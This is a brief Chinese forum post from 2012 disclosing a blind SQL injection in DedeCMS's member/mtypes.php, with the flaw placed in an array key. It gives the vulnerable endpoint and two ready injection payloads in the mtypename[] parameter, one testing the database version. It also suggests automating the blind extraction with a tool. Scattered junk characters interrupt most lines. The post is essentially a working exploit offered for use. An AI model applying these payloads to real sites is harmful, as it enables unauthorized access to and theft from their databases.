需要magic_quotes_gpc = Off,所以说是鸡肋啊.
9 R5 W% a: D2 |$ |; |0 X9 C2 Q
" Q( K d9 H! A0 v " e" `; u: q/ N/ r8 M6 n2 a2 g" p
发生在数组key里的注射漏洞,有点意思.3 p, w! E6 ~( e% o9 t( N& P. G; s
1 ~( k. J' N$ ]这里是盲注,就是麻烦点同样可以利用,可以写个工具,自动话的跑一下
6 o. E8 V3 e" R4 K+ {, d4 O6 F
8 \/ Z8 h$ V1 q! C; e* f! G8 c( nhttp://www.xxx.com /dede/member/mtypes.php?dopost=save
' K+ w1 H7 X% B
4 P X( M7 c" j4 B3 Vexploit:
! F/ D7 c/ E7 Nmtypename[7' and (@`'` or (56%3D56/*sql inject here*/)) and '3'%3D'3]=c4rp3nt3r
8 P5 D, d1 r6 w4 fmtypename[7' and (@`'` or (substring(@@version,1,1)=5)) and '3'%3D'3]=c4rp3nt3r& ~0 F# ], o% X3 I4 i/ W5 B
|
发表于 2012-12-20 08:08:09
收藏
支持
反对